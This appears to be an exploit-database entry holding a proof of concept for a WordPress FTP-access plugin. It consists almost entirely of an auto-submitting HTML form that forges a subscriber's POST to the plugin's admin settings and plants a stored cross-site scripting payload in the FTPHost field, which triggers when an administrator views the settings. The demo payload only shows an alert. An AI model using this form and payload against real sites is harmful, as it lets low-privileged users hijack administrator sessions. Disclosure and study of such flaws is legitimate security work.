## https://sploitus.com/exploit?id=WPEX-ID:76ABF4AC-5CC1-41A0-84C3-DFF42C659581
Open the following HTML file when logged in as a subscriber or above:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=ftp-access%2Fftp-access.php" method="POST">
<input type="text" name="action">
<input type="text" name="FTPHost" value='"><script>alert(/XSS/)</script>'>
<input type="text" name="FTPUser" value="Updated by subscriber">
<input type="text" name="FTPPassword" value="Updated by subscriber">
<input type="text" name="FTPHid" value="FTPHid">
<input type="submit" value="submit">
</form>
</body>
The XSS will be triggered when an admin access the settings of the plugin